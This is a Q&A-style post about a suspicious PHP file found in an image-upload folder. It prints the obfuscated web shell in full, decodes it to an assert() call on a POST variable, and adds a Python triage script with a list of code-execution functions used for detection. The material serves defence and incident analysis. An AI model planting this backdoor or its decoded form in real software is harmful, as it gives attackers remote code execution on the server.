Unknown PHP file in my uploads folder: is it malicious code?

Recently I found out my project got hacked, and I found a script in my images folder, which is a directory for users to upload their images (using a file input). Here is the script that I found in the directory.

errot_db.php

<?php                  
@$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";                  
@$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";                  
@$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}                  
[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);
?>

This code hides the following statement:

@assert ($_POST[025]);

Which means it'll execute the PHP code sent in the POST variable "025". So, yes, this is indeed a backdoor! I recommend asking on security.stackexchange.com for help on how to properly deal with the fallout.
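An added example, not part of the original question or answer: a Python triage script that undoes the two tricks used in the file above (block comments interleaved between tokens, and string literals split by concatenation) and reports which function a variable call resolves to and which request superglobal it reads. The function names, regexes and sink list are choices made for this example, and the sample is the script from the question embedded as a constructed test input.

```python
import re

# Constructed sample: the script quoted in the question above.
SAMPLE = r'''<?php
@$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";
@$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";
@$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}
[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);
?>'''

# Functions that run caller-supplied code or commands (list chosen for this example).
SINKS = {"assert", "system", "exec", "passthru", "shell_exec", "popen", "proc_open"}

COMMENT = re.compile(r"/\*.*?\*/", re.S)  # PHP block comments do not nest
CONCAT = re.compile(r'"([^"\\$]*)"\s*\.\s*"([^"\\$]*)"')  # "a"."b", no escapes
ASSIGN = re.compile(r"\$(\w+)\s*=\s*([^;]+);")
VAR = re.compile(r"\$(\w+)")
CALL = re.compile(r"\$(\w+)\s*\(")  # variable function call: $f(...)
SUPER = re.compile(r'\$(?:\{\s*"(_[A-Z]+)"\s*\}|(_[A-Z]+)\b)')  # ${"_POST"} or $_POST
LITERAL = re.compile(r'\s*"([^"\\$]*)"\s*')

def fold(text):
    """Merge adjacent string literals joined by '.' until nothing changes."""
    prev = None
    while prev != text:
        prev, text = text, CONCAT.sub(r'"\1\2"', text)
    return text

def analyze(src):
    """Triage heuristic, not a PHP parser: comment markers inside strings are stripped too."""
    text = fold(COMMENT.sub("", src))
    known = {}  # variable name -> resolved string value
    for name, rhs in ASSIGN.findall(text):
        # Substitute already-resolved variables, then fold the concatenation again.
        rhs = fold(VAR.sub(lambda m: '"%s"' % known[m.group(1)]
                           if m.group(1) in known else m.group(0), rhs))
        lit = LITERAL.fullmatch(rhs)
        if lit:
            known[name] = lit.group(1)
    callees = sorted({known[n] for n in CALL.findall(text) if n in known})
    inputs = sorted({a or b for a, b in SUPER.findall(text)})
    return {"callees": callees, "inputs": inputs,
            "suspicious": bool(set(callees) & SINKS and inputs)}

if __name__ == "__main__":
    print(analyze(SAMPLE))
```

Run over every file in an upload directory, a result with `suspicious` set to true marks a file for manual review; a clean result does not prove a file is safe, since the script only handles these two obfuscation patterns.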